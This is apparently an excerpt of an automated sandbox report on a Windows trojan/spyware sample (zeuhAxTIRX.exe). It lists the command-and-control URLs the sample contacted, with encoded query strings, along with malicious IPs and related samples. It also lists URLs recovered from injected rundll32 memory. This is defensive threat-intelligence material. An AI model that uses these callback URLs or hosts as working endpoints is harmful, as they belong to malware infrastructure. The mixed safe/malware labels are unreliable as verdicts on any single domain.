                            		154.205.192.37
                            		truetrue
                              		unknown
                              www.cmproutdoors.com
                              		156.255.170.114
                              		truetrue
                                		unknown
                                www.ontheverge.wales
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.0w3jy.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.frogair.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.parkhomenko-zinaida.ru
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.staciesellslka.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.frogair.online/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=u+zktjrvfgHZI+Oz0oPk7S6z3SS4eQzlxj31ise38TMlPN2sQxJreAld73CkW67638HFSoqfGq7wTiBJHuDRXWnGAUEuFgsZZw==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.lastmilerent.com/dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoHtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.ontheverge.wales/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=FfOdtLZjvYP8bXm/clPh5g/7x4+RQqyIHbKOkwKrIc0A7AIax+WKqABy5xS4eERJuSBeHh7W6Lqe0kjzR+0vnl8saQ3UdmHxRw==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dezella.xyz/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=wbPnfyQfXR4PZAPT09H9uXzHHhq4HhWkGwCNvg5IVQDwAqkAqM9rZA7nMC+fOtAInmSNsI36IN462a2w51jaKCiXRWhZTFR9pQ==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.fildoor.store/dhxt/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.parkhomenko-zinaida.ru/dhxt/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.0w3jy.com/dhxt/?UlkAHnsI=FUiWQqlvvhcOKQQuFFk1YdMODVpPUkI9QkHdYK1vvGDvQckHnduU+ib0kpFdu5Ayi+Be8xCaUG88sYAzbmt0txmA9iBLGYJGLw==&2ani-=qhGAdkIKoHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.staciesellslka.com/dhxt/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.cmproutdoors.com/dhxt/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoHtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.gmbuxie.net/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.ontheverge.wales/dhxt/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.moneycarrewards.com/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA==true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.gmbuxie.net/dhxt/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.staciesellslka.com/dhxt/?UlkAHnsI=ifokxT4WC6kpOYMw3zM3kyJ4LmgGiGZS0703YorY1YsjQRfHkIwKIIkPfqFmPEtQEdhteK5+EAiLfL0gYcUW2DoEXWveCWJMNw==&2ani-=qhGAdkIKoHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.frogair.online/dhxt/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.lastmilerent.com/dhxt/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.utmedicined.com/dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=GMJpuu0CUPuENYia2wBq5vF0+NhzyO/+t2WdNBBbZP32/2p6mtsWQVykz4YrZzp7DrUWVvB/4Ftn1F9mFxE3fjZXBYQ8lylMnw==true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dezella.xyz/dhxt/true
                                          • Avira URL Cloud: malware
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabj-E8-1M.8.drfalse
                                            		high
                                            https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_-200x71.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wpzillow_w3.css?rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.staciesellslka.com/wp-content/uploads/fusion-styles/c31c9462cccd628e3a0d26c81b9be7b5.min.rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=j-E8-1M.8.drfalse
                                              		high
                                              http://www.staciesellslka.com/wp-content/uploads/fusion-scripts/cfbe0fd0551026bb9e720017defa5c86.minrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/css/wprev-pubrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.staciesellslka.com/homes-for-sale-search/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://piensasolutions.com/imgs/parking/icon-desplegar.jpgrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprs-unslider-minrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correorundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://ogp.me/ns/fb#rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_camparundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.comrundll32.exe, 00000008.00000002.831753356.0000000005776000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.832455626.0000000006CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.staciesellslka.com/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.staciesellslka.comrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.staciesellslka.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.worundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.staciesellslka.com/mortgage-calculator/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.realestatewithstacie.com/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.staciesellslka.com/wp-content/uploads/2023/01/white-logo-300.fw_.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssrundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprev-public_temrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.staciesellslka.com/properties/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensarundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.staciesellslka.com/lake-anna/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camprundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.539329346.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://search.yahoo.com?fr=mainrundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.staciesellslka.com/blog/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=j-E8-1M.8.drfalse
                                                                    		high
                                                                    https://www.netqwik.comrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.staciesellslka.com/wp-content/uploads/2023/02/realtor-logo.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/KFOmCnqEu92Fr1Mu4mxK.woff2rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://piensasolutions.com/imgs/parking/icon-hosting.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drfalse
                                                                        		high
                                                                        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-192.jpgrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff2rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-350.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsrundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://search.yahoo.com/searchrundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.staciesellslka.com/about/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://ogp.me/ns#rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://piensasolutions.com/imgs/parking/icon-facebook-small.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.staciesellslka.com/wp-content/uploads/fusion-icons/mechanic-icon-set/fonts/mechanic.ttf?rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://piensasolutions.com/imgs/parking/icon-twitter-small.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://kestrel.idxhome.com/ihf-kestrel.js?ver=6.1.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.staciesellslka.com/wp-includes/css/classic-themes.min.css?ver=1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://twitter.com/piensasolutionsrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.staciesellslka.com/wp-content/themes/Avada-Child-Theme/style.css?ver=6.1.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.staciesellslka.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://survey-smiles.comrundll32.exe, 00000008.00000002.831753356.0000000004AE6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://piensasolutions.com/css/parking2.cssrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssrundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4grundll32.exe, 00000008.00000002.831753356.0000000005908000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://search.yahoo.com?fr=crmas_sfpfj-E8-1M.8.drfalse
                                                                                                  		high
                                                                                                  http://www.staciesellslka.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://tilda.ccrundll32.exe, 00000008.00000002.831753356.0000000004F9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.staciesellslka.com/feed/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider-dorundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-250.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpgrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.staciesellslka.com/xmlrpc.php?rsdrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.staciesellslka.com/wp-admin/admin-ajax.phprundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.staciesellslka.com/open-home-search/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprev-public.js?vrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.staciesellslka.com/wp-includes/wlwmanifest.xmlrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-270.jpgrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=werundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.staciesellslka.com/contact-me/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/js/wprev-publrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.staciesellslka.com/wp-content/uploads/fusion-icons/psychology-v1.1/fonts/psychology.ttf?rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.staciesellslka.com/wp-json/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drfalse
                                                                                                          		high
                                                                                                          https://plus.google.com/u/0/102310483732773374239rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-500.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://api.w.org/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/o-0IIpQlx3QUlC5A4PNr5TRA.woff2rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              63.141.242.45
                                                                                                              		www.utmedicined.comUnited States
                                                                                                              		33387NOCIXUStrue
                                                                                                              172.67.156.58
                                                                                                              		www.b-yy.xyzUnited States
                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                              87.236.16.107
                                                                                                              		www.fildoor.storeRussian Federation
                                                                                                              		198610BEGET-ASRUtrue
                                                                                                              156.255.170.114
                                                                                                              		www.cmproutdoors.comSeychelles
                                                                                                              		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                                              199.59.243.222
                                                                                                              		www.moneycarrewards.comUnited States
                                                                                                              		395082BODIS-NJUStrue
                                                                                                              199.192.28.121
                                                                                                              		www.dezella.xyzUnited States
                                                                                                              		22612NAMECHEAP-NETUStrue
                                                                                                              185.215.4.36
                                                                                                              		parkhomenko-zinaida.ruDenmark
                                                                                                              		50129TVHORADADAEStrue
                                                                                                              81.169.145.72
                                                                                                              		frogair.onlineGermany
                                                                                                              		6724STRATOSTRATOAGDEtrue
                                                                                                              132.148.233.235
                                                                                                              		staciesellslka.comUnited States
                                                                                                              		398101GO-DADDY-COM-LLCUStrue
                                                                                                              164.88.122.250
                                                                                                              		hk.ygrcw.cnSouth Africa
                                                                                                              		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                                                                              154.205.192.37
                                                                                                              		www.gmbuxie.netSeychelles
                                                                                                              		26484IKGUL-26484UStrue
                                                                                                              3.127.73.216
                                                                                                              		d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.comUnited States
                                                                                                              		16509AMAZON-02USfalse
                                                                                                              217.76.156.252
                                                                                                              		www.lastmilerent.comSpain
                                                                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                              General Information

                                                                                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                              Analysis ID:799425
                                                                                                              Start date and time:2023-02-06 14:35:06 +01:00
                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 21s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                              Number of analysed new started processes analysed:8
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • HDC enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample file name:zeuhAxTIRX.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@9/1@13/13
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HDC Information:
                                                                                                              • Successful, ratio: 61.8% (good quality ratio 54.9%)
                                                                                                              • Quality average: 71%
                                                                                                              • Quality standard deviation: 33.3%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 58
                                                                                                              • Number of non-executed functions: 140
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              14:38:01API Interceptor953x Sleep call for process: explorer.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              63.141.242.45DOCUMENTO DE ENV#U00cdO DE DHL AWB _111832457673,pdf.exeGet hashmaliciousBrowse
                                                                                                              • www.mymcdsteam.com/nrln/?a8=0SaqTxJcRJWkyehWW3/hso9MZLYrJuBx3GU00ypoFZtdnrHBIi36Pu8xXGKSlqx+bR5DY3rucn3zCffZ78ceC3H7kTWiFW66Aw==&-ZhHy=9rjLF0cXFDNXMtc
                                                                                                              ALUMIL-220919-W11678292.exeGet hashmaliciousBrowse
                                                                                                              • www.cccoaa.com/p01e/?dRm=1b9DHxg&hTvdTF=4hykDnoTF/sxyyhybAyjZhtGLVB4MoUab+zlw9oBbMOSO3kTBv8+tlgY3fc4YEmPIOp1uTEEHH8adEnI4YTA9JRpqCGpzu0o5w==
                                                                                                              Pepsico LLC RFQ Information.com.exeGet hashmaliciousBrowse
                                                                                                              • www.keepsylvaniasafe.com/ogxr/?kP2d-p=8pJX&7nmPFn0=98w301zUq/zVwRI+jgSpfSKHJg/k68VlfsxrCXLKVs1gpCm0WBMgw/m2NG30j+idIZLPPY4pIPKz8r/HjVrR1CJj4inMzivJdQ==
                                                                                                              case_documents_invoice.exeGet hashmaliciousBrowse
                                                                                                              • www.faktorwillowridge.com/q40s/?4hotV=dDKxyZj0elmTv&Tfl0drG8=Ob0TnCo1I/ehBPufZDhkIycx62bazzcuXx9C/ndCtq+JlcwxTedMwIPizVKBowsgUDyVoSTbH0UCJCVNZNC3LE8uBtLRUHQ7nA==
                                                                                                              SWIFT COPY & ADVICE.vbsGet hashmaliciousBrowse
                                                                                                              • www.tdminsurance.com/h96v/?p2Mp2X=guaIk6a+z9ugzJsFhbFJI0C52asU5eE0KpgQY39Re+8gwzDqr/385/kH6KTmRubhrYNP/waLGa2szEon4g1hwbQVEojUApJLWw==&2dLtNL=Uhu8XxG0-J
                                                                                                              DETAILS AND INVOICES.exeGet hashmaliciousBrowse
                                                                                                              • www.fleetcsr.co.uk/a612/?n6AtAl=m1M9S4OYrD5cDZGVq3mMu2KI0B03OBy2MmWKUOGVpal+piT3cK/jKsepsjNVkFdi2/D+1p5QWd/pxNTJAG3EJ62flr0sLm4X7w==&0VY=h6yDY
                                                                                                              raw.exeGet hashmaliciousBrowse
                                                                                                              • www.dyfaanfamily.com/mabs/?cT0XLlXX=qW2FJsS656D8TTOeuqBuZ5T98FCMmmselu+uBRBywFN9NNujWqTHZYihzdGh0uR1GjdOvopwCA==&4haX9=JZYd0HF0dn9pEj5p
